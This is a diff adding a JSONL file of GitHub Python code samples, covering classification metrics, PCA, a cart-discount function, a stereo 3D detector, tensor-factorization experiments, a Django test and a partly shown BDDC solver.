diff --git "a/2293.jsonl" "b/2293.jsonl" new file mode 100644--- /dev/null +++ "b/2293.jsonl" @@ -0,0 +1,1586 @@ +{"seq_id":"14890886439","text":"import numpy as np\nimport pandas as pd\n\n\n# 混淆矩阵\ndef confusion_matrix(y_true, y_pred, labels=[0, 1, 2]):\n # 默认转换为numpy数组\n # y_true, y_pred = np.array(y_true), np.array(y_pred)\n\n n = len(labels)\n matrix = np.zeros((n, n))\n for i in range(n):\n for j in range(n):\n if i == j:\n index = (y_true == labels[i])\n matrix[i][j] = sum(y_true[index] == y_pred[index])\n else:\n # wrongly predict i to j\n index = (y_true == labels[i])\n matrix[i][j] = sum(y_pred[index] == labels[j])\n\n return matrix\n\n\n# 精度\ndef precision(conf_matrix):\n n = len(conf_matrix)\n P = np.zeros((n,))\n\n for i in range(n):\n P[i] = conf_matrix[i][i] / sum(conf_matrix[:, i])\n # print('精度: ', P)\n return sum(P) / n\n\n\n# 召回率\ndef recall(conf_matrix):\n n = len(conf_matrix)\n R = np.zeros((n,))\n\n for i in range(n):\n R[i] = conf_matrix[i][i] / sum(conf_matrix[i, :])\n # print('召回率: ', R)\n return sum(R) / n\n\n\n# F1度量\ndef F1_score(P, R):\n return 2 * P * R / (P + R)\n","repo_name":"lqz72/MNIST-classifier","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38566364604","text":"from matplotlib.pyplot import plot\r\nfrom model import pca, find_k\r\nimport numpy as np\r\nimport functions\r\n\r\n\r\n# Loading data and plotting faces\r\nX = functions.load_data(r'D:\\ML\\PCA\\faces.mat')\r\nfunctions.plot_faces(X)\r\n\r\n# Normalizing data\r\nX_normalized = X / 255\r\n\r\n\r\n# Running PCA\r\nU, S, V = pca(X_normalized)\r\n\r\n# Plotting first 36 eigen vectors\r\nfunctions.plot_faces(np.transpose(U[:, :36]) * 255)\r\n\r\n\r\n# Finding number of pricipal components\r\nk, variance_retained = find_k(S)\r\n\r\nprint(f\"\\nnumber of principal components = {k}\")\r\n\r\n\r\n# Reduction\r\nU_reduce = U[:, :k]\r\nz = np.dot(X_normalized, U_reduce)\r\n\r\n\r\n# Recovering features\r\nX_recovered = np.dot(z, np.transpose(U_reduce))\r\n\r\nX_recovered *= 255\r\nfunctions.plot_faces(X_recovered)\r\n","repo_name":"rishabmamgai/PCA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26447642806","text":"reduction = 0\n\ndef reduction_prixPanier(panier):\n prixTotal = []\n global reduction\n for prod in panier: # Kevin Bonga, aide pour la boucle en WEBA\n listQuantite = int(prod.get(\"quantity\"))\n listPrix = prod.get(\"price\")\n\n if type(listQuantite) == int and type(listPrix) == float:\n totalLigne = float(listPrix) * listQuantite\n prixTotal.append(totalLigne)\n else:\n raise TypeError('La quantité doit être en int, les prix en float.')\n\n prixTotal = sum(prixTotal)\n\n if (prixTotal) and (listQuantite) and (listPrix) < 0:\n raise TypeError('Le montant doit être positif.')\n else:\n if (prixTotal >= 1000):\n prixTotal=prixTotal*80/100\n reduction = prixTotal*20/100\n elif (prixTotal >= 500 and prixTotal < 1000):\n prixTotal=prixTotal * 90 / 100\n reduction = prixTotal*10/100\n elif (prixTotal >= 250 and prixTotal < 500):\n prixTotal=prixTotal * 95 / 100\n reduction = prixTotal*5/100\n else:\n prixTotal\n reduction\n return 
prixTotal\n","repo_name":"andrepntlv/Projet_Tests_Python","sub_path":"reduction_prixPanier.py","file_name":"reduction_prixPanier.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36931759202","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision.ops import nms\nfrom visualDet3D.networks.utils.registry import DETECTOR_DICT\nfrom visualDet3D.utils.timer import profile\nfrom visualDet3D.networks.heads import losses\nfrom visualDet3D.networks.detectors.yolostereo3d_core import YoloStereo3DCore\nfrom visualDet3D.networks.heads.detection_3d_head import StereoHead\nfrom visualDet3D.networks.lib.blocks import AnchorFlatten, ConvBnReLU\nfrom visualDet3D.networks.backbones.resnet import BasicBlock\n\n\n\n@DETECTOR_DICT.register_module\nclass Stereo3D(nn.Module):\n \"\"\"\n Stereo3D\n \"\"\"\n def __init__(self, network_cfg):\n super(Stereo3D, self).__init__()\n\n self.obj_types = network_cfg.obj_types\n\n self.build_head(network_cfg)\n\n self.build_core(network_cfg)\n\n self.network_cfg = network_cfg\n\n def build_core(self, network_cfg):\n self.core = YoloStereo3DCore(network_cfg.backbone)\n\n def build_head(self, network_cfg):\n self.bbox_head = StereoHead(\n **(network_cfg.head)\n )\n\n self.disparity_loss = losses.DisparityLoss(maxdisp=96)\n\n def train_forward(self, left_images, right_images, annotations, P2, P3, disparity=None):\n \"\"\"\n Args:\n img_batch: [B, C, H, W] tensor\n annotations: check visualDet3D.utils.utils compound_annotation\n calib: visualDet3D.kitti.data.kitti.KittiCalib or anything with obj.P2\n Returns:\n cls_loss, reg_loss: tensor of losses\n loss_dict: [key, value] pair for logging\n \"\"\"\n output_dict = self.core(torch.cat([left_images, right_images], dim=1))\n depth_output = output_dict['depth_output']\n\n cls_preds, reg_preds = self.bbox_head(\n dict(\n features=output_dict['features'],\n P2=P2,\n image=left_images\n )\n )\n\n anchors = self.bbox_head.get_anchor(left_images, P2)\n\n cls_loss, reg_loss, loss_dict = self.bbox_head.loss(cls_preds, reg_preds, anchors, annotations, P2)\n\n if reg_loss.mean() > 0 and not disparity is None and not depth_output is None:\n disp_loss = 1.0 * self.disparity_loss(depth_output, disparity)\n loss_dict['disparity_loss'] = disp_loss\n reg_loss += disp_loss\n\n self.depth_output = depth_output.detach()\n else:\n loss_dict['disparity_loss'] = torch.zeros_like(reg_loss)\n return cls_loss, reg_loss, loss_dict\n\n def test_forward(self, left_images, right_images, P2, P3):\n assert left_images.shape[0] == 1 # we recommmend image batch size = 1 for testing\n\n output_dict = self.core(torch.cat([left_images, right_images], dim=1))\n depth_output = output_dict['depth_output']\n\n cls_preds, reg_preds = self.bbox_head(\n dict(\n features=output_dict['features'],\n P2=P2,\n image=left_images\n )\n )\n\n anchors = self.bbox_head.get_anchor(left_images, P2)\n\n scores, bboxes, cls_indexes = self.bbox_head.get_bboxes(cls_preds, reg_preds, anchors, P2, left_images)\n \n return scores, bboxes, cls_indexes\n\n\n def forward(self, inputs):\n\n if isinstance(inputs, list) and len(inputs) >= 5:\n return self.train_forward(*inputs)\n else:\n return 
self.test_forward(*inputs)\n","repo_name":"Owen-Liuyuxuan/visualDet3D","sub_path":"visualDet3D/networks/detectors/yolostereo3d_detector.py","file_name":"yolostereo3d_detector.py","file_ext":"py","file_size_in_byte":3508,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"53"} +{"seq_id":"32448634684","text":"from data_helper import fdtf_config\nfrom fdtf import FDTF\nfrom utils import make_dir, strRed, strBlue\nimport json\nimport os\nimport numpy as np\nimport pickle\nfrom multiprocessing import Lock, Pool\n\noutput_lock = Lock()\n\n\ndef run_fdtf_exp(data_str, course_str, model_str, fold, concept_dim, lambda_t,\n lambda_q, lambda_bias, slr, lr, max_iter, metrics, log_file, validation, validation_limit = 30, test_range = None):\n \"\"\"\n cross validation on the first fold of dataset to tune the hyper-parameters,\n then we will use those best hyper-parameters evaluate the performance on all folds\n \"\"\"\n\n if course_str == \"Quiz\" or course_str == \"QuizIceBreaker\":\n views = \"100\"\n elif course_str == \"Lecture\":\n views = \"010\"\n elif course_str == \"Discussion\":\n views = \"001\"\n elif course_str == \"Quiz_Lecture\":\n views = \"110\"\n elif course_str == \"Quiz_Discussion\":\n views = \"101\"\n elif course_str == \"Quiz_Lecture_Discussion\":\n views = \"111\"\n else:\n raise IOError\n\n model_config = fdtf_config(\n data_str, course_str, views, concept_dim, fold, lambda_t, lambda_q,\n lambda_bias, slr, lr, max_iter, metrics, log_file, validation, validation_limit, test_range)\n\n\n if model_str == 'fdtf':\n model = FDTF(model_config)\n else:\n raise EnvironmentError(\"ERROR!!\")\n\n if validation is True:\n test_data = model_config['val']\n else:\n test_data = model_config['test']\n model.train_data.extend(model_config['val'])\n\n # since the test start attempt for different students are different,\n # we need to find the first testing attempt, and add all lectures and discussion before\n # test_start_attempt into train_data\n\n test_start_attempt = None\n for (student, attempt, material, score, resource) in sorted(test_data, key=lambda x: x[1]):\n if resource == 0:\n test_start_attempt = attempt\n break\n else:\n model.train_data.append((student, attempt, material, score, resource))\n if test_start_attempt is None:\n raise EnvironmentError\n\n perf_dict = {}\n for test_attempt in range(test_start_attempt, model.num_attempts):\n model.current_test_attempt = test_attempt\n model.lr = lr\n restart_training(model)\n train_perf = model.training()\n\n test_set = []\n for (student, attempt, material, score, resource) in test_data:\n if attempt == model.current_test_attempt:\n test_set.append((student, attempt, material, score, resource))\n model.train_data.append((student, attempt, material, score, resource))\n\n test_perf = model.testing(test_set)\n if test_attempt not in perf_dict:\n perf_dict[test_attempt] = {}\n perf_dict[test_attempt]['train'] = train_perf\n if validation:\n perf_dict[test_attempt]['val'] = test_perf\n else:\n perf_dict[test_attempt]['test'] = test_perf\n\n overall_perf = model.eval(model.test_obs_list, model.test_pred_list)\n if validation:\n perf_dict['val'] = overall_perf\n else:\n perf_dict['test'] = overall_perf\n\n\n for stu in range(0, model.num_users):\n if stu in model_config['max_stu_attempt']:\n max_att = model_config['max_stu_attempt'][stu]\n if max_att < model.num_attempts - 1:\n model.T[stu,max_att + 2:] = model.T[stu, max_att + 1]\n\n save_exp_results(model, perf_dict, data_str, course_str, 
model_str, fold,\n concept_dim, lambda_t, lambda_q, lambda_bias, slr, lr,max_iter, validation=validation)\n\n\ndef restart_training(model):\n # initialize the bias for each attempt, student, question, lecture, or discussion\n if int(model.views[0]) == 1:\n model.T = np.random.random_sample((model.num_users, model.num_attempts,\n model.num_concepts))\n model.Q = np.random.random_sample((model.num_concepts, model.num_questions))\n model.bias_s = np.zeros(model.num_users)\n model.bias_t = np.zeros(model.num_attempts)\n model.bias_q = np.zeros(model.num_questions)\n model.global_bias = np.mean(model.train_data, axis=0)[3]\n else:\n raise AttributeError\n\n return model\n\n\ndef save_exp_results(model, perf_dict, data_str, course_str, model_str, fold,\n concept_dim, lambda_t, lambda_q, lambda_bias, slr, lr, max_iter, validation):\n\n if not validation:\n model_dir_path = \"saved_models/{}/{}/{}/fold_{}\".format(data_str, course_str, model_str,\n fold)\n make_dir(model_dir_path)\n para_str = \"concept_{}_lt_{}_lq_{}_lbias_{}_slr_{}_\" \\\n \"lr_{}_max_iter_{}\".format(concept_dim,lambda_t, lambda_q,lambda_bias, slr, lr, max_iter)\n model_file_path = \"{}/{}_model.pkl\".format(model_dir_path, para_str)\n pickle.dump(model, open(model_file_path, \"wb\"))\n\n result_dir_path = \"results/{}/{}/{}\".format(\n data_str, course_str, model_str\n )\n make_dir(result_dir_path)\n\n if validation:\n result_file_path = \"{}/fold_{}_cross_val.json\".format(result_dir_path, fold)\n else:\n result_file_path = \"{}/fold_{}_test_results.json\".format(result_dir_path, fold)\n\n if not os.path.exists(result_file_path):\n with open(result_file_path, \"w\") as f:\n pass\n\n result = {\n 'concept_dim': concept_dim,\n 'lambda_t': lambda_t,\n 'lambda_q': lambda_q,\n 'lambda_bias': lambda_bias,\n 'student_learning_rate': slr,\n 'learning_rate': lr,\n 'max_iter': max_iter,\n 'perf': perf_dict\n }\n\n output_lock.acquire()\n with open(result_file_path, \"a\") as f:\n f.write(json.dumps(result) + \"\\n\")\n output_lock.release()\n\n\ndef print_experiment_results(data_str, course_str, model_str, metric, num_folds=5):\n \"\"\"\n find best hyperparameter via k-fold cross validation\n :param data_str:\n :param course_str:\n :param model_str:\n :param num_folds:\n :return:\n \"\"\"\n combined_results = {}\n combined_detail_results = {}\n # for fold in [1,5]:\n for fold in range(1, num_folds + 1):\n output_path = \"results/{}/{}/{}/fold_{}_test_results.json\".format(\n data_str, course_str, model_str, fold\n )\n\n with open(output_path, \"r\") as f:\n count = 0\n for line in f:\n count += 1\n result = json.loads(line)\n key = (data_str, course_str, model_str,\n result['concept_dim'],\n result['lambda_t'],\n result['lambda_q'],\n result['lambda_bias'],\n result['student_learning_rate'],\n result['learning_rate'], result['max_iter'])\n perf = result[\"perf\"]['test']\n detail_perf = result[\"perf\"]\n\n if key not in combined_results:\n combined_results[key] = {}\n combined_results[key][fold] = perf\n\n if key not in combined_detail_results:\n combined_detail_results[key] = {}\n if fold not in combined_detail_results[key]:\n combined_detail_results[key][fold] = detail_perf\n\n # compute the average perf over k folds on a specific metric\n for para in combined_results.keys():\n perf_list = []\n for fold in combined_results[para]:\n print(strBlue(combined_results[para][fold][metric]))\n perf_list.append(combined_results[para][fold][metric])\n avg_perf = np.mean(perf_list)\n combined_results[para] = avg_perf\n\n print(strRed('avg: 
{}'.format(avg_perf)))\n\n\n for para in combined_detail_results.keys():\n for fold in combined_detail_results[para]:\n print(strRed(\"\\nfold, attempt, train count, train rmse, val count, val {}\".format(metric)))\n for attempt in combined_detail_results[para][fold]:\n if attempt != \"test\":\n train_count, train_rmse = combined_detail_results[para][fold][attempt]['train']\n if combined_detail_results[para][fold][attempt]['test'] == {}:\n test_count = 0\n test_metric = 0\n else:\n test_count = combined_detail_results[para][fold][attempt]['test']['count']\n test_metric = combined_detail_results[para][fold][attempt]['test'][metric]\n print(\"{},{},{:.0f},{:.4f},{:.0f},{}\".format(\n fold, attempt, train_count, train_rmse, test_count, test_metric))\n\n\n\n\ndef run_mastery_grids():\n data_str = \"mastery_grids\"\n course_str = 'Quiz'\n model_str = 'fdtf'\n\n if course_str == \"Quiz\":\n concept_dim = 15\n lambda_t = 0\n lambda_q = 0.01\n lambda_bias = 0\n slr = 0.5\n lr = 0.1\n max_iter = 30\n\n validation = False\n metrics = [\"rmse\", \"mae\", \"auc\"]\n\n num_folds = 1\n for fold in range(1, num_folds + 1):\n log_path = \"logs/{}/{}/{}/test_fold_{}/\".format(data_str, course_str, model_str, fold)\n make_dir(log_path)\n\n para = [data_str, course_str, model_str, fold, concept_dim,\n lambda_t, lambda_q, lambda_bias, slr, lr, max_iter]\n\n delimiter = '_'\n log_name = delimiter.join([str(e) for e in para[4:]])\n log_file = \"{}/{}\".format(log_path, log_name)\n para.append(metrics)\n para.append(log_file)\n para.append(validation)\n\n run_fdtf_exp(*para)\n\n\ndef run_morf():\n data_str = \"morf\"\n # course_str = 'Quiz'\n # course_str = 'Quiz_Lecture'\n # course_str = 'Quiz_Discussion'\n # course_str = 'Quiz_Lecture_Discussion'\n course_str = 'QuizIceBreaker'\n model_str = 'fdtf'\n\n test_range = None\n\n if course_str == \"Quiz\":\n concept_dim = 5\n lambda_t = 0.001\n lambda_q = 0\n lambda_bias = 0\n slr = 0.5\n lr = 0.1\n max_iter = 50\n\n if course_str == \"Quiz_Lecture\":\n concept_dim = 7\n lambda_t = 0.01\n lambda_q = 0\n lambda_bias = 0\n slr = 0.4\n lr = 0.1\n max_iter = 30\n\n if course_str == 'Quiz_Discussion':\n concept_dim = 5\n lambda_t = 0.1\n lambda_q = 0\n lambda_bias = 0\n slr = 0.7\n lr = 0.1\n max_iter = 30\n\n if course_str == 'Quiz_Lecture_Discussion':\n concept_dim = 9\n lambda_t = 0.1\n lambda_q = 0\n lambda_bias = 0\n slr = 0.5\n lr = 0.1\n max_iter = 30\n\n if course_str == 'QuizIceBreaker':\n concept_dim = 5\n lambda_t = 0.01\n lambda_q = 0\n lambda_bias = 0.0001\n slr = 1.0\n lr = 0.1\n max_iter = 20\n\n test_range = [1, 25]\n\n validation = False\n validation_limit = 30\n metrics = [\"rmse\", \"mae\"]\n\n para_list = []\n num_folds = 5\n\n step = 1\n\n if step == 1:\n for fold in range(1, num_folds + 1):\n log_path = \"logs/{}/{}/{}/test_fold_{}/\".format(data_str, course_str, model_str, fold)\n make_dir(log_path)\n\n para = [data_str, course_str, model_str, fold, concept_dim,\n lambda_t, lambda_q, lambda_bias, slr, lr, max_iter]\n\n delimiter = '_'\n log_name = delimiter.join([str(e) for e in para[4:]])\n log_file = \"{}/{}\".format(log_path, log_name)\n para.append(metrics)\n para.append(log_file)\n para.append(validation)\n para.append(validation_limit)\n para.append(test_range)\n\n\n # run_fdtf_exp(*para)\n para_list.append(para)\n pool = Pool(processes=5)\n pool.starmap(run_fdtf_exp, para_list)\n pool.close()\n\n if step == 2:\n print_experiment_results(data_str, course_str, model_str, metric = \"rmse\", num_folds = 5)\n\n\ndef run_laura():\n data_str = 
\"laura\"\n course_str = 'QuizIceBreaker'\n model_str = 'fdtf'\n\n\n if course_str == 'QuizIceBreaker':\n concept_dim = 7\n lambda_t = 0.001\n lambda_q = 0\n lambda_bias = 0.001\n slr = 0.5\n lr = 0.1\n max_iter = 20\n\n test_range = [1, 50]\n\n validation = False\n validation_limit = 30\n metrics = [\"rmse\", \"mae\"]\n\n para_list = []\n num_folds = 5\n\n step = 1\n\n if step == 1:\n for fold in range(1, num_folds + 1):\n log_path = \"logs/{}/{}/{}/test_fold_{}/\".format(data_str, course_str, model_str, fold)\n make_dir(log_path)\n\n para = [data_str, course_str, model_str, fold, concept_dim,\n lambda_t, lambda_q, lambda_bias, slr, lr, max_iter]\n\n delimiter = '_'\n log_name = delimiter.join([str(e) for e in para[4:]])\n log_file = \"{}/{}\".format(log_path, log_name)\n para.append(metrics)\n para.append(log_file)\n para.append(validation)\n para.append(validation_limit)\n para.append(test_range)\n\n\n # run_fdtf_exp(*para)\n para_list.append(para)\n pool = Pool(processes=5)\n pool.starmap(run_fdtf_exp, para_list)\n pool.close()\n\n if step == 2:\n print_experiment_results(data_str, course_str, model_str, metric = \"rmse\", num_folds = 5)\n\n\nif __name__ == '__main__':\n # run_mastery_grids()\n run_morf()\n # run_laura()","repo_name":"sz612866/Tensor-Factorization-EDM","sub_path":"FDTF/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":13617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"69904356969","text":"from django.urls import include, path, reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase, URLPatternsTestCase\n\n\nclass AccountTests(APITestCase, URLPatternsTestCase):\n urlpatterns = [\n path(\"\", include(\"hello_world.urls\")),\n ]\n\n def test_hello_world(self):\n \"\"\"\n Ensure we can create a new account object.\n \"\"\"\n url = reverse(\"hello-world\")\n response = self.client.get(url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data, {\"msg\": \"Hello world\"})\n","repo_name":"bergran/drf_template","sub_path":"hello_world/tests/test_hello_world.py","file_name":"test_hello_world.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20849645211","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[50]:\n\n\nimport numpy as np\nimport math\nimport scipy\nimport scipy.linalg \n\n\n# In[ ]:\n\n\n\n\n\n# In[51]:\n\n\nNvm = 10\nnvm=10\n\n\n# In[52]:\n\n\ndef Fc(x):\n global lb\n global lnv\n global ng\n global DomNum\n global domain_B\n global domain_KiiR\n global domain_K\n global lii\n \n y = np.zeros([ng, 1]);\n yy = np.zeros([lnv, 1]);\n w = np.zeros([lnv, 1]);\n lb =lb.astype('int')\n \n for i in range(DomNum):\n [n] = lb.shape\n [m] = lii[0, :].shape\n w[lb-1, :] = domain_B[i, lb-1, :]@x;\n Ri = domain_KiiR[i, :, :]\n temp_matrix = np.zeros([n, m])\n for j in range(n):\n for k in range(m):\n temp_matrix[j,k] = domain_K[i, lb[j]-1, lii[0,k]-1]\n temp2 = np.zeros([n,n])\n for j in range(n):\n for k in range(n):\n temp2[j,k] = domain_K[i, lb[j]-1, lb[k]-1]\n temp4 = np.zeros([m,n])\n for j in range(m):\n for k in range(n):\n temp4[j, k] = domain_K[i, lii[0, j]-1, lb[k]-1]\n temp3 = np.linalg.solve(Ri.T, temp4@w[lb-1])\n temp3 = np.linalg.solve(Ri, temp3)\n yy[lb-1, :] = temp2@w[lb-1, :]-temp_matrix@temp3\n y = y+domain_B[i, lb-1, :].T@yy[lb-1];\n return y\n\n\n# In[53]:\n\n\ndef pc(x):\n y1 = np.zeros([ng, 1])\n y2 = 
np.zeros([nc,1])\n yc = np.zeros([nc, 1])\n y3 = np.zeros([ng,1])\n D_lb = np.zeros([DomNum,lb.size, lb.size])\n K_cr = np.zeros([DomNum, lcc.size, lrr.size])\n K_rc = np.zeros([DomNum, lrr.size, lcc.size])\n for i in range(DomNum):\n for j in range(lb.size):\n for k in range(lb.size):\n D_lb[i, j,k] = domain_D[i,lb[j]-1,lb[k]-1]\n for j in range(lcc.size):\n for k in range(lrr.size):\n K_cr[i,j,k] = domain_K[i,lcc[j]-1,lrr[k]-1]\n for j in range(lrr.size):\n for k in range(lcc.size):\n K_rc[i,j,k] = domain_K[i,lrr[j]-1,lcc[k]-1]\n for i in range(DomNum):\n lx = np.zeros([lnv,1])\n llx = np.zeros([lnv,1])\n \n lx[lb-1] = D_lb[i,:,:]@domain_B[i,lb-1,:]@x\n ytemp=np.linalg.solve(domain_KrrR[i,:,:].T, lx[lrr-1])\n ytemp = np.linalg.solve(domain_KrrR[i, :, :], ytemp)\n llx[lrr-1] = ytemp\n \n y1 = y1+domain_B[i,lb-1,:].T@D_lb[i,:,:].T@llx[lb-1]\n lx[lcc-1]=lx[lcc-1]-K_cr[i,:,:]@ytemp\n yc = yc+domain_Bc[i,lb-1, :].T@lx[lb-1]\n y2 = np.linalg.solve(Rc.T, yc)\n y2 = np.linalg.solve(Rc, y2)\n for i in range(DomNum):\n lx = np.zeros([lnv,1])\n llx = np.zeros([lnv,1])\n ytempc = domain_Bc[i,lcc-1,:]@y2\n lx[lcc-1]=ytempc\n ytemp = K_rc[i,:,:]@ytempc\n ytemp = np.linalg.solve(domain_KrrR[i,:,:].T, ytemp)\n ytemp = np.linalg.solve(domain_KrrR[i,:,:], ytemp)\n lx[lrr-1] = -ytemp\n y3 = y3+domain_B[i,lb-1,:].T@D_lb[i,:,:].T@lx[lb-1]\n y=y1+y3\n return y\n \n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[54]:\n\n\ndef cg(x, b, max_it, tol):\n flag = 0;\n iterate = 0;\n bnrm2 = np.linalg.norm(b);\n if bnrm2 == 0:\n brnm2 = 1;\n alpha = np.zeros(max_it)\n beta = np.zeros(max_it)\n d = np.zeros(max_it)\n s = np.zeros(max_it-1)\n r=b-Fc(x);\n error = np.linalg.norm(r)/bnrm2;\n if error0:\n beta[iterate] = rho/rho_1;\n p = z+beta[iterate]*p;\n else:\n p=z;\n q = Fc(p);\n alpha[iterate] = rho/(p.T@q)\n x= x+alpha[iterate]*p\n r=r-alpha[iterate]*q;\n error = np.linalg.norm(r)/bnrm2;\n print('PCG residual('+ str(iterate) +') = '+str(error))\n if error<=tol:\n break\n rho_1=rho;\n d[0] = 1/alpha[0]\n for i in range(iterate-1):\n d[i+1] = beta[i+1]/alpha[i]+1/alpha[i+1]\n for i in range(iterate-1):\n s[i] = -1*((beta[i+1])**.5)/alpha[i]\n T = np.zeros([iterate, iterate])\n T[0,0] = d[0]\n for i in range(iterate-1):\n T[i+1,i+1] = d[i+1]\n for i in range(iterate-1):\n T[i,i+1] = s[i]\n T[i+1,i] = T[i,i+1]\n lamb = np.linalg.eig(T)\n lamb = lamb[0]\n lambmax = lamb.max()\n lambmin = lamb.min()\n condnumber = lambmax/lambmin\n print('lambda max = ' + str(lambmax))\n print('lambda min = ' + str(lambmin))\n print('condition number = ' + str(condnumber))\n if error>tol:\n flag = 1\n #if 1 then no convergeance\n \n return [x, error, iterate, flag]\n \n\n\n# In[55]:\n\n\nrange(0)\n\n\n# In[56]:\n\n\ndef BDDC(Nvm, nvm, a1, a2):\n #--------These constant for grid ------------ \n sqr15 = math.sqrt(15)\n intx=np.array([1/3, (6+sqr15)/21, (9-2*sqr15)/21, (6+sqr15)/21, (6-sqr15)/21, (9+2*sqr15)/21, (6-sqr15)/21]);\n\n inty=np.array([1/3, (6+sqr15)/21, (6+sqr15)/21, (9-2*sqr15)/21, (6-sqr15)/21, (6-sqr15)/21, (9+2*sqr15)/21]);\n\n intw=np.array([9/80, (155+sqr15)/2400, (155+sqr15)/2400, (155+sqr15)/2400, (155-sqr15)/2400, (155-sqr15)/2400, (155-sqr15)/2400]);\n\n #======================================================\n import time\n start = time.time()\n #-------- This constant for PCG -------------\n\n max_it=1000; \n tol=10**(-8);\n #======================================================\n\n rm=1;\n rn=1;\n\n global DomNum\n global lii\n global lb\n global lrr\n global lnv\n global nv\n global nr\n global ng\n global nr1\n 
global ldd\n global lcc\n global domain_B\n global domain_KiiR\n global domain_K\n global nc\n global domain_D\n global Rc\n global domain_KrrR\n global domain_K\n global domain_Bc\n \n \n \n Nvn=Nvm;\n Ne=Nvm*Nvn;\n Hm=rm/Nvm;\n Hn=rn/Nvn;\n DomNum=Nvm*Nvn;\n # order all the domain \n\n\n\n # get the mesh in each subdomain \n\n nvn=nvm;\n hm=rm/(nvm*Nvm);\n hn=rn/(nvn*Nvn);\n ne=Nvm*Nvn*nvm*nvn*2;\n pi = math.pi\n nvm1=nvm+1;\n nvn1=nvn+1;\n nvm01=nvm-1;\n Nvm01=Nvm-1;\n\n lnv=nvm1*nvn1;\n \n # domain struct:\n # int num; /* global number of the domain */\n # Mat K; /* local stiffness matrix */\n # Vec f; \n # Mat BrT; /* transpose if the connectivity matrices;\n # Mat Bc; /* the corner connectivity matrix */\n # Mat Q; /* matrix for optional (e.g. edge) constraints */\n # set InteriorN /* Interior nodes */\n # set Boundary[4] /* boundary nodes */\n\n # initial the domain structure \n\n eachne=nvm*nvn*2;\n eachnv=nvn1*nvm1;\n lnv=eachnv;\n nv=lnv*Nvm*Nvn;\n\n # to get the local connectivity matrix\n\n lijtk=np.reshape(np.linspace(1,lnv,num=lnv),(nvn1,nvm1));\n lnconn= np.zeros([3, nvm*nvn*2])\n ii=0;\n for i in range(nvm):\n ip=i+1;\n for j in range(nvn):\n jp=j+1;\n lnconn[0,ii] =lijtk[i,j];\n lnconn[1,ii] =lijtk[ip,j];\n lnconn[2,ii] =lijtk[ip,jp];\n lnconn[0,ii+1]=lijtk[i,j];\n lnconn[1,ii+1]=lijtk[i,jp];\n lnconn[2,ii+1]=lijtk[ip,jp];\n ii=ii+2; \n lii = np.reshape((lijtk[1:nvm,1:nvn]),(1,(nvn-1)*(nvm-1))) ;\n lb=np.union1d(lijtk[0,:], lijtk[nvm1-1,:])\n lb=np.union1d(lb, lijtk[1:nvm,0]);\n lb=np.union1d(lb, (lijtk[1:nvm,nvn1-1]).T);\n ldd= lb;\n lrr= np.append(lii[0,:], [lb]);\n lcc=np.array([lijtk[0,0], lijtk[0,nvn1-1], lijtk[nvm1-1,0], lijtk[nvm1-1,nvn1-1]]);\n lrr=np.setdiff1d(lrr,lcc);\n lrr = lrr.astype('int')\n ldd=np.setdiff1d(ldd,lcc);\n ss=lrr.size;\n lnr=ss;\n ss=lii.size;\n lni=ss;\n ss=lb.size;\n lnb=ss;\n nr=(nvm-1)*Nvn*Nvm01*2;\n nc=(Nvm-1)*Nvm01;\n\n ng=nvm01*Nvn*Nvm01*2+Nvm01*Nvm01;\n dsize=Nvm*Nvn\n dindex=0;\n domain_num = np.empty(dsize)\n domain_utrue = np.empty([dsize,lnv])\n domain_u = np.empty([dsize,lnv])\n domain_rho = np.empty(dsize)\n domain_K = np.empty([dsize, eachnv, eachnv])\n domain_Kdi = np.empty([dsize, ldd.size, lii.size])\n domain_KiiR = np.empty([dsize, lii.size, lii.size])\n domain_KrrR = np.empty([dsize, lrr.size, lrr.size])\n domain_Kci =np.empty([dsize, lcc.size, lii.size])\n domain_Kcc = np.empty([dsize, lcc.size, lcc.size])\n domain_Krc= np.empty([dsize, lrr.size, lcc.size])\n domain_fd = np.empty([dsize, ldd.size])\n domain_fc = np.empty([dsize, lcc.size])\n domain_fi =np.empty([dsize, lii.size])\n domain_fb = np.empty([dsize, lb.size])\n domain_u =np.empty([dsize, lnv])\n domain_ff = np.empty([dsize, lnv, 1])\n domain_Bc = np.empty([dsize, lnv, nc])\n domain_D = np.empty([dsize, lnv, lnv])\n domain_B = np.empty([dsize, lnv, ng])\n \n for ii in range(Nvm):\n for jj in range(Nvn):\n #order the domain by the order\n #5 10\n #4 9 \n #3 8\n #2 7\n #1 6\n aK = np.zeros([eachnv, eachnv]);\n f= np.zeros([eachnv,1]);\n dindex = dindex+1;\n domain_num[dindex-1]=dindex;\n ebegin=(dindex-1)*eachne+1;\n eend= ebegin+eachne-1;\n rmb = (ii)*Hm; # begin x coord\n rme = rmb+hm*nvm; #end x coord\n rnb = (jj)*Hn;#begin y coord\n rne= rnb+hn*nvn; #end y coord\n x = np.zeros([2,lnv]);\n for i in range(nvm1):\n for j in range(lijtk[i,:].shape[0]):\n x[1,int(lijtk[i,j]-1)] = np.linspace(rnb,rne,num=nvn1)[j];\n for i in range(nvn1):\n for j in range(lijtk[:,i].shape[0]):\n x[0,int(lijtk[j,i]-1)] = np.linspace(rmb,rme,num=nvm1)[j];\n b=np.zeros([lnv,1]);\n coeff = 
